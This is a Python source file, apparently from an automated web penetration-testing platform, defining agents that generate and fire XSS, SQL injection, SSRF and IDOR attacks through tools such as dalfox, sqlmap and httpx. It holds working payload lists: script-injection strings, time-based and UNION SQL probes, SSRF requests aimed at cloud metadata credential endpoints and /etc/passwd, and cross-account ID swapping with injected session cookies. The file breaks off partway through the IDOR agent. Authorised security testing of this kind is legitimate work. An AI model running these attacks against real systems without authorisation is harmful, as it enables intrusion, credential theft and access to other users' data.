"""
swarm_intelligence_engine.py — Specialized AI Security Agents

Each agent follows a 5-phase lifecycle:
  1. analyze_graph()       — identify relevant attack graph nodes
  2. generate_hypotheses() — produce ranked, context-aware attack hypotheses
  3. execute_tests()       — run targeted security tests via ToolRegistry
  4. report_findings()     — push findings to shared state + update graph
  5. learn_from_results()  — update per-agent memory (EMA) + persist to KB

Specialized agents: XSS, SQLi, SSRF, IDOR, Auth, BusinessLogic, Mobile, API

Usage:
    from swarm_intelligence_engine import create_agent, AgentType
    agent = create_agent(AgentType.XSS, tool_registry=reg, attack_graph=engine)
    findings = await agent.run(target="example.com", context={...})
"""

from __future__ import annotations

import asyncio
import json
import logging
import time
import uuid
from abc import ABC, abstractmethod
from dataclasses import dataclass, field
from enum import Enum
from typing import Any, Dict, List, Optional

logger = logging.getLogger(__name__)

# ── Optional platform imports ─────────────────────────────────────────────────

try:
    from attack_graph_core.graph_engine import (
        AttackGraphEngine, NodeType, EdgeType, get_engine,
    )
    _GRAPH_AVAILABLE = True
except ImportError:
    _GRAPH_AVAILABLE = False
    AttackGraphEngine = None  # type: ignore
    NodeType = None           # type: ignore
    EdgeType = None           # type: ignore

try:
    from learning.knowledge_base import KnowledgeBase
    _KB_AVAILABLE = True
except ImportError:
    _KB_AVAILABLE = False
    KnowledgeBase = None  # type: ignore

try:
    from modules.tool_wrappers import ToolRegistry, ToolResult
    _TOOLS_AVAILABLE = True
except ImportError:
    _TOOLS_AVAILABLE = False
    ToolRegistry = None  # type: ignore


# ── Enumerations ──────────────────────────────────────────────────────────────

class AgentType(str, Enum):
    XSS            = "xss"
    SQLI           = "sqli"
    SSRF           = "ssrf"
    IDOR           = "idor"
    AUTH           = "auth"
    BUSINESS_LOGIC = "business_logic"
    MOBILE         = "mobile"
    API            = "api"


class AgentStatus(str, Enum):
    IDLE          = "idle"
    ANALYZING     = "analyzing"
    HYPOTHESIZING = "hypothesizing"
    TESTING       = "testing"
    REPORTING     = "reporting"
    LEARNING      = "learning"
    DONE          = "done"
    FAILED        = "failed"


# ── Data models ───────────────────────────────────────────────────────────────

@dataclass
class Hypothesis:
    """A single attack hypothesis generated by an agent."""
    hypothesis_id:  str
    agent_type:     AgentType
    target_node:    str           # URL / node-id
    attack_vector:  str           # e.g. "reflected_xss:q"
    confidence:     float         # 0.0 – 1.0 prior estimate
    payload:        str
    context:        Dict[str, Any] = field(default_factory=dict)
    reasoning:      str = ""
    priority:       float = 0.5   # 0 = low, 1 = high


@dataclass
class AgentFinding:
    """A confirmed (or high-confidence suspected) vulnerability."""
    finding_id:     str
    agent_id:       str
    agent_type:     AgentType
    target:         str
    vuln_type:      str
    severity:       str            # critical / high / medium / low / info
    title:          str
    description:    str
    payload:        str
    evidence:       str
    cvss:           float
    confidence:     float
    reproduced:     bool
    graph_node_id:  Optional[str]  = None
    chain_potential: List[str]     = field(default_factory=list)
    remediation:    str            = ""
    timestamp:      float          = field(default_factory=time.time)

    def to_kb_dict(self) -> Dict:
        """Convert to format expected by KnowledgeBase.record_finding()."""
        return {
            "target":      self.target,
            "vuln_type":   self.vuln_type,
            "severity":    self.severity,
            "cvss_score":  self.cvss,
            "endpoint":    self.target,
            "parameter":   self.payload[:120] if self.payload else "",
            "source_tool": self.agent_id,
            "chain_id":    ",".join(self.chain_potential),
        }


@dataclass
class AgentMemory:
    """
    Per-agent persistent memory for cross-session learning.
    Success rates are updated via Exponential Moving Average (EMA).
    """
    successful_payloads:  List[Dict] = field(default_factory=list)
    failed_payloads:      List[Dict] = field(default_factory=list)
    pattern_rates:        Dict[str, float] = field(default_factory=dict)  # vector → rate
    tech_best_payloads:   Dict[str, List[str]] = field(default_factory=dict)
    total_tests:          int = 0
    successful_tests:     int = 0

    EMA_ALPHA = 0.30  # weight for new observations

    @property
    def success_rate(self) -> float:
        if self.total_tests == 0:
            return 0.40  # neutral prior
        return self.successful_tests / self.total_tests

    def update_rate(self, vector: str, success: bool) -> None:
        prev = self.pattern_rates.get(vector, 0.40)
        obs  = 1.0 if success else 0.0
        self.pattern_rates[vector] = (1 - self.EMA_ALPHA) * prev + self.EMA_ALPHA * obs
        self._normalize_rates()

    def apply_decay(self, decay_factor: float = 0.9) -> None:
        """Gradually decay learned rates over time to prevent stagnation."""
        for vector in self.pattern_rates:
            # Decay towards the neutral prior of 0.40
            current = self.pattern_rates[vector]
            self.pattern_rates[vector] = 0.40 + (current - 0.40) * decay_factor

    def _normalize_rates(self) -> None:
        """Prevent overfitting by limiting max variance."""
        rates = list(self.pattern_rates.values())
        if not rates:
            return
        avg = sum(rates) / len(rates)
        for vector, rate in self.pattern_rates.items():
            if rate > 0.95:
                self.pattern_rates[vector] = 0.95  # Cap absolute certainty
            elif rate < 0.05:
                self.pattern_rates[vector] = 0.05  # Floor absolute failure

    def rate(self, vector: str, default: float = 0.40) -> float:
        return self.pattern_rates.get(vector, default)

    def top_payloads(self, n: int = 8) -> List[str]:
        """Return payloads ranked by associated vector success rate."""
        scored = [
            (self.pattern_rates.get(p.get("vector", ""), 0) * p.get("confidence", 0.5), p["payload"])
            for p in self.successful_payloads[-60:]
        ]
        scored.sort(reverse=True)
        return [pay for _, pay in scored[:n]]


# ── Base agent ────────────────────────────────────────────────────────────────

class SwarmAgent(ABC):
    """
    Abstract base for all swarm intelligence agents.

    Subclasses implement:
      - generate_hypotheses()  — domain-specific hypothesis generation
      - execute_tests()        — domain-specific tool execution
    """

    # Subclasses declare which NodeTypes they care about
    RELEVANT_NODE_TYPES: List[str] = []
    RELEVANT_LABEL_KEYWORDS: List[str] = []

    def __init__(
        self,
        agent_type:     AgentType,
        tool_registry:  Optional[Any] = None,
        attack_graph:   Optional[Any] = None,
        knowledge_base: Optional[Any] = None,
        shared_state:   Optional[Dict] = None,
    ):
        self.agent_id       = f"{agent_type.value}_{uuid.uuid4().hex[:8]}"
        self.agent_type     = agent_type
        self.tool_registry  = tool_registry
        self.attack_graph   = attack_graph
        self.knowledge_base = knowledge_base
        self.shared_state   = shared_state if shared_state is not None else {}
        self.status         = AgentStatus.IDLE
        self.memory         = AgentMemory()
        self.findings:  List[AgentFinding] = []
        self.hypotheses: List[Hypothesis]  = []
        self._stop_event = asyncio.Event()
        logger.debug("[%s] Initialized", self.name)

    @property
    def name(self) -> str:
        return f"{self.agent_type.value.upper()}-{self.agent_id[-4:].upper()}"

    def stop(self) -> None:
        self._stop_event.set()

    # ── Main lifecycle ────────────────────────────────────────────────────────

    async def run(self, target: str, context: Dict[str, Any]) -> List[AgentFinding]:
        """
        Full agent lifecycle:
          analyze → hypothesize → test → report → learn
        Returns all findings discovered during this run.
        """
        start_time = time.time()
        try:
            self.status = AgentStatus.ANALYZING
            graph_nodes = await self.analyze_graph(target, context)

            self.status = AgentStatus.HYPOTHESIZING
            hypotheses = await self.generate_hypotheses(target, graph_nodes, context)
            self.hypotheses = hypotheses
            logger.info("[%s] %d hypotheses for %s", self.name, len(hypotheses), target)

            self.status = AgentStatus.TESTING
            findings = await self.execute_tests(target, hypotheses, context)
            self.findings.extend(findings)

            self.status = AgentStatus.REPORTING
            await self.report_findings(findings)

            self.status = AgentStatus.LEARNING
            await self.learn_from_results(findings, hypotheses)

            self.status = AgentStatus.DONE
            elapsed = time.time() - start_time
            logger.info("[%s] Done in %.1fs — %d findings", self.name, elapsed, len(findings))
            return findings

        except asyncio.CancelledError:
            self.status = AgentStatus.IDLE
            return self.findings
        except Exception as exc:
            self.status = AgentStatus.FAILED
            logger.error("[%s] Unhandled error: %s", self.name, exc)
            return self.findings

    # ── Graph analysis ────────────────────────────────────────────────────────

    async def analyze_graph(self, target: str, context: Dict) -> List[Dict]:
        """Collect relevant graph nodes + context endpoints into a unified list."""
        nodes: List[Dict] = []

        if self.attack_graph and _GRAPH_AVAILABLE:
            try:
                for ntype in self.RELEVANT_NODE_TYPES:
                    matches = self.attack_graph.find_nodes(node_type=ntype)
                    for n in matches:
                        nodes.append({"id": n.id, "label": n.label,
                                      "type": n.node_type, "props": n.properties})
                for keyword in self.RELEVANT_LABEL_KEYWORDS:
                    matches = self.attack_graph.find_nodes(label_contains=keyword)
                    for n in matches:
                        entry = {"id": n.id, "label": n.label,
                                 "type": n.node_type, "props": n.properties}
                        if entry not in nodes:
                            nodes.append(entry)
            except Exception as exc:
                logger.debug("[%s] Graph analysis: %s", self.name, exc)

        # Supplement with raw endpoint list from context
        for ep in context.get("endpoints", []):
            nodes.append({"id": ep, "label": ep, "type": "url", "props": {}})

        return nodes

    # ── Abstract methods ──────────────────────────────────────────────────────

    @abstractmethod
    async def generate_hypotheses(
        self, target: str, graph_nodes: List[Dict], context: Dict
    ) -> List[Hypothesis]:
        """Generate prioritised attack hypotheses from graph nodes + context."""

    @abstractmethod
    async def execute_tests(
        self, target: str, hypotheses: List[Hypothesis], context: Dict
    ) -> List[AgentFinding]:
        """Execute tests against hypotheses, return confirmed findings."""

    # ── Reporting ─────────────────────────────────────────────────────────────

    async def report_findings(self, findings: List[AgentFinding]) -> None:
        """
        1. Append to shared_state["findings"]
        2. Add vulnerability nodes to the attack graph
        3. Emit to shared_state event bus if present
        """
        if not findings:
            return

        # Shared state
        self.shared_state.setdefault("findings", []).extend(findings)

        # Attack graph
        if self.attack_graph and _GRAPH_AVAILABLE:
            for f in findings:
                try:
                    node = self.attack_graph.add_node(
                        node_type  = NodeType.VULNERABILITY,
                        label      = f.title,
                        properties = {
                            "vuln_type":  f.vuln_type,
                            "payload":    f.payload[:500],
                            "confidence": f.confidence,
                            "agent":      self.agent_id,
                            "evidence":   f.evidence[:500],
                            "chains":     f.chain_potential,
                        },
                        severity    = f.severity,
                        risk_score  = f.cvss,
                        exploitable = f.reproduced,
                        source      = self.agent_id,
                    )
                    f.graph_node_id = node.id
                    # Edge: endpoint → vulnerability
                    if f.target:
                        ep_nodes = self.attack_graph.find_nodes(label_contains=f.target)
                        if ep_nodes:
                            self.attack_graph.add_edge(
                                ep_nodes[0].id, node.id,
                                edge_type=EdgeType.HAS_VULNERABILITY,
                                label=f.vuln_type,
                                probability=f.confidence,
                                source_engine=self.agent_id,
                            )
                except Exception as exc:
                    logger.debug("[%s] Graph update error: %s", self.name, exc)

        # Event bus (coordinator injects a queue)
        event_queue: Optional[asyncio.Queue] = self.shared_state.get("event_queue")
        if event_queue:
            for f in findings:
                await event_queue.put({"type": "finding", "agent": self.agent_id,
                                       "agent_type": self.agent_type, "finding": f})

        logger.info("[%s] Reported %d findings", self.name, len(findings))

    # ── Learning ──────────────────────────────────────────────────────────────

    async def learn_from_results(
        self, findings: List[AgentFinding], hypotheses: List[Hypothesis]
    ) -> None:
        """Update EMA rates and persist to KB."""
        # Apply time decay to historical learning before adding new observations
        self.memory.apply_decay(decay_factor=0.95)

        confirmed_payloads = {f.payload for f in findings if f.confidence >= 0.70}

        for h in hypotheses:
            self.memory.total_tests += 1
            success = h.payload in confirmed_payloads
            if success:
                self.memory.successful_tests += 1
                self.memory.successful_payloads.append({
                    "payload":    h.payload,
                    "vector":     h.attack_vector,
                    "confidence": h.confidence,
                })
            else:
                self.memory.failed_payloads.append({
                    "payload": h.payload,
                    "vector":  h.attack_vector,
                })
            self.memory.update_rate(h.attack_vector, success)

        # Persist to KB
        if self.knowledge_base and findings and _KB_AVAILABLE:
            session_id = self.shared_state.get("session_id", self.agent_id)
            for f in findings:
                try:
                    self.knowledge_base.record_finding(
                        session_id=session_id,
                        finding=f.to_kb_dict(),
                        confirmed=f.reproduced,
                    )
                    self.knowledge_base.record_tool_run(
                        tool_name=self.agent_type.value,
                        vuln_type=f.vuln_type,
                        target_type="web",
                        success=True,
                        findings_count=1,
                        duration_s=0.0,
                    )
                except Exception:
                    pass

    # ── Helpers ───────────────────────────────────────────────────────────────

    def _finding(self, **kwargs) -> AgentFinding:
        """Shortcut to create a properly-typed AgentFinding."""
        return AgentFinding(
            finding_id=f"SI-{uuid.uuid4().hex[:10].upper()}",
            agent_id=self.agent_id,
            agent_type=self.agent_type,
            **kwargs,
        )

    async def _tool(self, name: str, **kwargs) -> Dict:
        """Run a tool via ToolRegistry in an executor (non-blocking)."""
        if not self.tool_registry:
            return {}
        loop = asyncio.get_event_loop()
        try:
            result = await loop.run_in_executor(
                None, lambda: self.tool_registry.run(name, **kwargs)
            )
            if hasattr(result, "to_dict"):
                return result.to_dict()
            return result if isinstance(result, dict) else {}
        except Exception as exc:
            logger.debug("[%s] Tool %s error: %s", self.name, name, exc)
            return {}

    def _boost_confidence(self, base: float, tech_stack: List[str],
                          target_techs: List[str]) -> float:
        tech_str = " ".join(t.lower() for t in tech_stack)
        if any(t.lower() in tech_str for t in target_techs):
            return min(base + 0.20, 0.95)
        return base


# ═════════════════════════════════════════════════════════════════════════════
# SPECIALIZED AGENTS
# ═════════════════════════════════════════════════════════════════════════════

class XSSAgent(SwarmAgent):
    """Cross-Site Scripting specialist — reflected, stored, DOM."""

    RELEVANT_NODE_TYPES    = ["url", "parameter", "api_endpoint"]
    RELEVANT_LABEL_KEYWORDS = ["form", "input", "search", "comment", "reflect"]

    _BASE_PAYLOADS = [
        "<script>alert(document.domain)</script>",
        "<img src=x onerror=alert(1)>",
        "'\"><svg/onload=alert(1)>",
        "<details open ontoggle=alert(1)>",
        "javascript:/*--></title></style></textarea></script><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>",
        "${alert(1)}",   # template injection probe
        "{{7*7}}",       # SSTI probe
        "</script><script>alert(1)</script>",
        "<body onload=alert(1)>",
        "';alert(String.fromCharCode(88,83,83))//",
    ]

    def __init__(self, **kwargs):
        super().__init__(AgentType.XSS, **kwargs)

    async def generate_hypotheses(self, target, graph_nodes, context) -> List[Hypothesis]:
        hypotheses: List[Hypothesis] = []
        endpoints  = context.get("endpoints", [target])
        params_map = context.get("parameters", {})
        tech_stack = context.get("tech_stack", [])
        js_sinks   = context.get("js_sinks", [])

        # Merge learned top payloads with base set
        payload_pool = self.memory.top_payloads(5) + [
            p for p in self._BASE_PAYLOADS if p not in self.memory.top_payloads(5)
        ]

        for ep in endpoints[:25]:
            ep_params = params_map.get(ep, ["q", "search", "input", "name", "msg"])
            for param in ep_params[:6]:
                base_conf = self.memory.rate("reflected_xss", 0.38)
                conf = self._boost_confidence(base_conf, tech_stack, ["php", "asp", "jsp", "coldfusion"])
                for payload in payload_pool[:5]:
                    hypotheses.append(Hypothesis(
                        hypothesis_id = uuid.uuid4().hex[:8],
                        agent_type    = self.agent_type,
                        target_node   = ep,
                        attack_vector = f"reflected_xss:{param}",
                        confidence    = conf,
                        payload       = payload,
                        context       = {"param": param, "endpoint": ep},
                        reasoning     = f"Param '{param}' may reflect user input without encoding",
                        priority      = conf,
                    ))

        # DOM XSS hypotheses from JS sink analysis
        for sink in js_sinks[:10]:
            hypotheses.append(Hypothesis(
                hypothesis_id = uuid.uuid4().hex[:8],
                agent_type    = self.agent_type,
                target_node   = sink.get("url", target),
                attack_vector = "dom_xss",
                confidence    = self.memory.rate("dom_xss", 0.55),
                payload       = "<img src=x onerror=alert(document.domain)>",
                context       = {"sink_type": sink.get("type"), "sink_url": sink.get("url")},
                reasoning     = f"DOM sink '{sink.get('type')}' may process untrusted data",
                priority      = 0.65,
            ))

        # Stored XSS via form endpoints
        form_eps = [ep for ep in endpoints if any(
            k in ep.lower() for k in ["comment", "post", "message", "profile", "bio"]
        )]
        for ep in form_eps[:5]:
            canary = f"XSSTEST-{uuid.uuid4().hex[:6]}"
            hypotheses.append(Hypothesis(
                hypothesis_id = uuid.uuid4().hex[:8],
                agent_type    = self.agent_type,
                target_node   = ep,
                attack_vector = "stored_xss",
                confidence    = self.memory.rate("stored_xss", 0.45),
                payload       = f"<script>/*{canary}*/alert(1)</script>",
                context       = {"endpoint": ep, "canary": canary},
                reasoning     = "Input-accepting endpoint may store and re-render unsanitized content",
                priority      = 0.70,
            ))

        hypotheses.sort(key=lambda h: h.priority, reverse=True)
        return hypotheses[:60]

    async def execute_tests(self, target, hypotheses, context) -> List[AgentFinding]:
        findings: List[AgentFinding] = []
        canary = f"XSSCANARY{uuid.uuid4().hex[:8]}"

        for h in hypotheses:
            if self._stop_event.is_set():
                break
            try:
                result = await self._tool(
                    "dalfox",
                    url=h.target_node,
                    param=h.context.get("param", ""),
                    payload=h.payload,
                )
                data  = result.get("data") or {}
                body  = str(data.get("body", "") if isinstance(data, dict) else data)
                status = (data.get("status", 0) if isinstance(data, dict) else 0)

                reflected = canary in body or h.payload in body
                dalfox_hit = result.get("success") and "XSS" in str(result.get("raw", ""))

                if reflected or dalfox_hit:
                    findings.append(self._finding(
                        target         = h.target_node,
                        vuln_type      = h.attack_vector.split(":")[0],
                        severity       = "high",
                        title          = f"XSS ({h.attack_vector}) — param: {h.context.get('param', '?')}",
                        description    = (f"Parameter '{h.context.get('param')}' reflects unsanitized "
                                          f"input allowing script injection."),
                        payload        = h.payload,
                        evidence       = body[:600],
                        cvss           = 7.4,
                        confidence     = 0.88 if dalfox_hit else 0.72,
                        reproduced     = True,
                        chain_potential= ["xss_to_account_takeover", "xss_csrf_chain"],
                        remediation    = "Apply context-aware output encoding; use Content-Security-Policy.",
                    ))
            except Exception as exc:
                logger.debug("[%s] XSS test error: %s", self.name, exc)
            await asyncio.sleep(0.04)

        return findings


# ─────────────────────────────────────────────────────────────────────────────

class SQLiAgent(SwarmAgent):
    """SQL Injection specialist — error-based, blind time-based, union."""

    RELEVANT_NODE_TYPES    = ["url", "api_endpoint", "parameter"]
    RELEVANT_LABEL_KEYWORDS = ["login", "search", "filter", "query", "user", "id"]

    _ERROR_SIGS = [
        "sql syntax", "mysql_fetch", "ora-", "sqlite3", "pg_query",
        "unclosed quotation", "syntax error near", "sqlstate", "mysql_num_rows",
        "microsoft ole db", "odbc drivers error", "division by zero",
    ]

    def __init__(self, **kwargs):
        super().__init__(AgentType.SQLI, **kwargs)

    async def generate_hypotheses(self, target, graph_nodes, context) -> List[Hypothesis]:
        hypotheses: List[Hypothesis] = []
        endpoints  = context.get("endpoints", [target])
        params_map = context.get("parameters", {})

        for ep in endpoints[:20]:
            ep_params = params_map.get(ep, ["id", "user", "search", "q", "filter", "sort"])
            for param in ep_params[:5]:
                # Error-based
                hypotheses.append(Hypothesis(
                    hypothesis_id = uuid.uuid4().hex[:8],
                    agent_type    = self.agent_type,
                    target_node   = ep,
                    attack_vector = "sqli_error",
                    confidence    = self.memory.rate("sqli_error", 0.33),
                    payload       = "'",
                    context       = {"param": param, "endpoint": ep},
                    reasoning     = f"Quoting '{param}' may expose SQL error message",
                    priority      = 0.65,
                ))
                # Time-based blind
                hypotheses.append(Hypothesis(
                    hypothesis_id = uuid.uuid4().hex[:8],
                    agent_type    = self.agent_type,
                    target_node   = ep,
                    attack_vector = "sqli_blind_time",
                    confidence    = self.memory.rate("sqli_blind_time", 0.28),
                    payload       = "1 AND SLEEP(5)-- -",
                    context       = {"param": param, "endpoint": ep},
                    reasoning     = f"Time-based blind: delay on '{param}' signals injection point",
                    priority      = 0.55,
                ))
                # UNION probe
                hypotheses.append(Hypothesis(
                    hypothesis_id = uuid.uuid4().hex[:8],
                    agent_type    = self.agent_type,
                    target_node   = ep,
                    attack_vector = "sqli_union",
                    confidence    = self.memory.rate("sqli_union", 0.25),
                    payload       = "' UNION SELECT NULL,NULL,NULL-- -",
                    context       = {"param": param, "endpoint": ep},
                    reasoning     = "UNION probe to determine column count",
                    priority      = 0.45,
                ))

        hypotheses.sort(key=lambda h: h.priority, reverse=True)
        return hypotheses[:45]

    async def execute_tests(self, target, hypotheses, context) -> List[AgentFinding]:
        findings: List[AgentFinding] = []

        for h in hypotheses:
            if self._stop_event.is_set():
                break
            try:
                t0     = time.time()
                result = await self._tool("sqlmap",
                    url=h.target_node,
                    param=h.context.get("param", "id"),
                    level=1, risk=1,
                )
                elapsed = time.time() - t0
                data    = result.get("data") or {}
                body    = str(data.get("body", "") if isinstance(data, dict) else data).lower()

                if any(sig in body for sig in self._ERROR_SIGS):
                    findings.append(self._finding(
                        target         = h.target_node,
                        vuln_type      = "sqli_error_based",
                        severity       = "critical",
                        title          = f"SQL Injection (Error-Based) — param: {h.context.get('param')}",
                        description    = "SQL error message exposed in response reveals injectable parameter.",
                        payload        = h.payload,
                        evidence       = body[:400],
                        cvss           = 9.8,
                        confidence     = 0.92,
                        reproduced     = True,
                        chain_potential= ["sqli_to_rce", "sqli_to_data_exfiltration"],
                        remediation    = "Use parameterised queries / prepared statements exclusively.",
                    ))
                elif elapsed >= 4.8 and h.attack_vector == "sqli_blind_time":
                    findings.append(self._finding(
                        target         = h.target_node,
                        vuln_type      = "sqli_blind_time_based",
                        severity       = "critical",
                        title          = f"Blind SQL Injection (Time-Based) — param: {h.context.get('param')}",
                        description    = f"Response delayed {elapsed:.1f}s — time-based blind SQLi confirmed.",
                        payload        = h.payload,
                        evidence       = f"Response time: {elapsed:.2f}s (threshold 4.8s)",
                        cvss           = 9.1,
                        confidence     = 0.80,
                        reproduced     = True,
                        chain_potential= ["sqli_to_rce"],
                        remediation    = "Replace dynamic SQL with ORM parameterised queries.",
                    ))
                elif result.get("success") and "injectable" in str(result.get("raw", "")).lower():
                    findings.append(self._finding(
                        target         = h.target_node,
                        vuln_type      = "sqli_confirmed",
                        severity       = "critical",
                        title          = f"SQL Injection Confirmed — param: {h.context.get('param')}",
                        description    = "sqlmap confirmed injection point.",
                        payload        = h.payload,
                        evidence       = str(result.get("raw", ""))[:500],
                        cvss           = 9.8,
                        confidence     = 0.95,
                        reproduced     = True,
                        chain_potential= ["sqli_to_rce", "sqli_to_data_exfiltration"],
                        remediation    = "Use parameterised queries.",
                    ))
            except Exception as exc:
                logger.debug("[%s] SQLi test error: %s", self.name, exc)
            await asyncio.sleep(0.08)

        return findings


# ─────────────────────────────────────────────────────────────────────────────

class SSRFAgent(SwarmAgent):
    """Server-Side Request Forgery specialist — cloud metadata, internal services."""

    RELEVANT_NODE_TYPES    = ["url", "api_endpoint"]
    RELEVANT_LABEL_KEYWORDS = ["url", "redirect", "fetch", "proxy", "import", "webhook", "callback"]

    _SSRF_PARAMS = {
        "url", "redirect", "next", "callback", "src", "href", "uri", "path",
        "dest", "goto", "target", "return", "returnurl", "image", "proxy",
        "fetch", "link", "load", "open", "file", "resource", "endpoint",
    }

    _CLOUD_PAYLOADS = [
        ("http://169.254.169.254/latest/meta-data/",              "aws"),
        ("http://169.254.169.254/latest/meta-data/iam/security-credentials/", "aws_iam"),
        ("http://metadata.google.internal/computeMetadata/v1/",   "gcp"),
        ("http://169.254.169.254/metadata/instance?api-version=2021-02-01", "azure"),
        ("http://100.100.100.200/latest/meta-data/",              "alibaba"),
        ("http://localhost/",                                      "internal"),
        ("http://127.0.0.1/",                                     "internal"),
        ("http://[::1]/",                                         "internal_ipv6"),
        ("file:///etc/passwd",                                    "lfi"),
        ("dict://localhost:11211/stats",                          "memcache"),
        ("http://0.0.0.0:22/",                                   "port_probe"),
    ]

    _CLOUD_INDICATORS = [
        "ami-id", "instance-id", "computeMetadata", "security-credentials",
        "iam", "access_key", "secret_key", "token", "IdentityDocument",
        "subscriptionId", "managedIdentity",
    ]

    def __init__(self, **kwargs):
        super().__init__(AgentType.SSRF, **kwargs)

    async def generate_hypotheses(self, target, graph_nodes, context) -> List[Hypothesis]:
        hypotheses: List[Hypothesis] = []
        endpoints  = context.get("endpoints", [target])
        params_map = context.get("parameters", {})
        tech_stack = context.get("tech_stack", [])

        cloud_bonus = 0.22 if any(
            t in " ".join(tech_stack).lower() for t in ["aws", "gcp", "azure", "cloud", "k8s"]
        ) else 0.0

        for ep in endpoints[:25]:
            all_params = set(params_map.get(ep, [])) | self._SSRF_PARAMS
            ssrf_params = {p for p in all_params if p.lower() in self._SSRF_PARAMS}

            for param in list(ssrf_params)[:4]:
                for payload, cloud_type in self._CLOUD_PAYLOADS[:6]:
                    conf = min(
                        self.memory.rate(f"ssrf_{cloud_type}", 0.38) + cloud_bonus,
                        0.92
                    )
                    hypotheses.append(Hypothesis(
                        hypothesis_id = uuid.uuid4().hex[:8],
                        agent_type    = self.agent_type,
                        target_node   = ep,
                        attack_vector = f"ssrf_{cloud_type}",
                        confidence    = conf,
                        payload       = payload,
                        context       = {"param": param, "endpoint": ep, "cloud": cloud_type},
                        reasoning     = f"Param '{param}' may trigger outbound request; targeting {cloud_type}",
                        priority      = conf,
                    ))

        hypotheses.sort(key=lambda h: h.priority, reverse=True)
        return hypotheses[:40]

    async def execute_tests(self, target, hypotheses, context) -> List[AgentFinding]:
        findings: List[AgentFinding] = []

        for h in hypotheses:
            if self._stop_event.is_set():
                break
            try:
                result = await self._tool("httpx",
                    url=h.target_node,
                    params={h.context.get("param", "url"): h.payload},
                )
                data = result.get("data") or {}
                body = str(data.get("body", "") if isinstance(data, dict) else data)

                cloud = h.context.get("cloud", "")
                if any(ind in body for ind in self._CLOUD_INDICATORS):
                    findings.append(self._finding(
                        target         = h.target_node,
                        vuln_type      = "ssrf_cloud_metadata",
                        severity       = "critical",
                        title          = f"SSRF → Cloud Metadata ({cloud}) via '{h.context.get('param')}'",
                        description    = "SSRF allows unauthenticated access to cloud instance metadata.",
                        payload        = h.payload,
                        evidence       = body[:600],
                        cvss           = 9.3,
                        confidence     = 0.92,
                        reproduced     = True,
                        chain_potential= ["ssrf_to_rce", "ssrf_to_iam_takeover", "ssrf_cloud_chain"],
                        remediation    = "Block outbound requests to IMDS ranges; use IMDSv2 with session tokens.",
                    ))
                elif "root:" in body or "[boot loader]" in body:
                    findings.append(self._finding(
                        target         = h.target_node,
                        vuln_type      = "ssrf_lfi",
                        severity       = "high",
                        title          = f"SSRF + Local File Read via '{h.context.get('param')}'",
                        description    = "SSRF allows reading arbitrary local files via file:// scheme.",
                        payload        = h.payload,
                        evidence       = body[:400],
                        cvss           = 8.6,
                        confidence     = 0.88,
                        reproduced     = True,
                        chain_potential= ["ssrf_to_rce"],
                        remediation    = "Deny file:// and private IP schemes in URL allowlist.",
                    ))
                elif data.get("status", 0) == 200 and len(body) > 100 and "localhost" in h.payload:
                    findings.append(self._finding(
                        target         = h.target_node,
                        vuln_type      = "ssrf_internal",
                        severity       = "high",
                        title          = f"SSRF → Internal Service Reachable via '{h.context.get('param')}'",
                        description    = "Server fetches and returns internal service responses.",
                        payload        = h.payload,
                        evidence       = body[:300],
                        cvss           = 8.1,
                        confidence     = 0.72,
                        reproduced     = True,
                        chain_potential= ["ssrf_to_internal_port_scan"],
                        remediation    = "Implement strict URL allowlist; deny RFC1918 and loopback addresses.",
                    ))
            except Exception as exc:
                logger.debug("[%s] SSRF test error: %s", self.name, exc)
            await asyncio.sleep(0.05)

        return findings


# ─────────────────────────────────────────────────────────────────────────────

class IDORAgent(SwarmAgent):
    """IDOR specialist — horizontal and vertical privilege escalation."""

    RELEVANT_NODE_TYPES    = ["url", "api_endpoint", "parameter"]
    RELEVANT_LABEL_KEYWORDS = ["id", "user", "account", "profile", "order", "resource", "document"]

    _ID_PARAMS = {"id", "user_id", "account_id", "order_id", "file_id",
                  "doc_id", "ticket_id", "profile_id", "item_id", "record_id", "uuid"}

    def __init__(self, **kwargs):
        super().__init__(AgentType.IDOR, **kwargs)
        self._auth_sessions: List[Dict] = []   # injected by coordinator

    def set_auth_sessions(self, sessions: List[Dict]) -> None:
        """Coordinator injects two or more user sessions for cross-account testing."""
        self._auth_sessions = sessions

    async def generate_hypotheses(self, target, graph_nodes, context) -> List[Hypothesis]:
        hypotheses: List[Hypothesis] = []
        endpoints  = context.get("endpoints", [target])
        params_map = context.get("parameters", {})
        own_id     = context.get("current_user_id", 100)
        import re

        for ep in endpoints[:25]:
            ep_params = params_map.get(ep, [])
            # Parameter-based IDOR
            for param in ep_params:
                if param.lower() in self._ID_PARAMS:
                    for alt_id in [int(own_id) - 1, int(own_id) + 1, 1, 2]:
                        hypotheses.append(Hypothesis(
                            hypothesis_id = uuid.uuid4().hex[:8],
                            agent_type    = self.agent_type,
                            target_node   = ep,
                            attack_vector = "idor_horizontal",
                            confidence    = self.memory.rate("idor_horizontal", 0.52),
                            payload       = str(alt_id),
                            context       = {"param": param, "endpoint": ep,
                                             "own_id": own_id, "alt_id": alt_id},
                            reasoning     = f"Sequential param '{param}': change {own_id}→{alt_id}",
                            priority      = 0.72,
                        ))
            # Path-based IDOR  (/api/users/123/profile)
            id_matches = re.findall(r"/(\d{1,12})(?:/|$)", ep)
            if id_matches:
                raw_id = int(id_matches[-1])
                for alt in [raw_id - 1, raw_id + 1, 1, 9999]:
                    new_ep = re.sub(r"/\d{1,12}(?=/|$)", f"/{alt}", ep, count=1)
                    hypotheses.append(Hypothesis(
                        hypothesis_id = uuid.uuid4().hex[:8],
                        agent_type    = self.agent_type,
                        target_node   = new_ep,
                        attack_vector = "idor_path",
                        confidence    = self.memory.rate("idor_path", 0.58),
                        payload       = str(alt),
                        context       = {"original": ep, "modified": new_ep,
                                         "original_id": raw_id, "alt_id": alt},
                        reasoning     = f"Path IDOR: replace /{raw_id}/ with /{alt}/",
                        priority      = 0.75,
                    ))

        hypotheses.sort(key=lambda h: h.priority, reverse=True)
        return hypotheses[:50]

    async def execute_tests(self, target, hypotheses, context) -> List[AgentFinding]:
        findings: List[AgentFinding] = []
        sessions = self._auth_sessions or context.get("auth_sessions", [{}])

        for h in hypotheses:
            if self._stop_event.is_set():
                break
            try:
                for session in sessions[:2]:
                    url = (h.target_node if h.attack_vector == "idor_path"
                           else h.context.get("endpoint", h.target_node))
                    params = ({h.context.get("param", ""): h.payload}
                              if h.attack_vector != "idor_path" else {})
                    result = await self._tool("httpx",
                        url=url,
                        params=params,
                        headers={
                            "Cookie":        session.get("cookie", ""),
                            "Authorization": session.get("token", ""),
                        },
                    )
                    data   = result.get("data") or {}
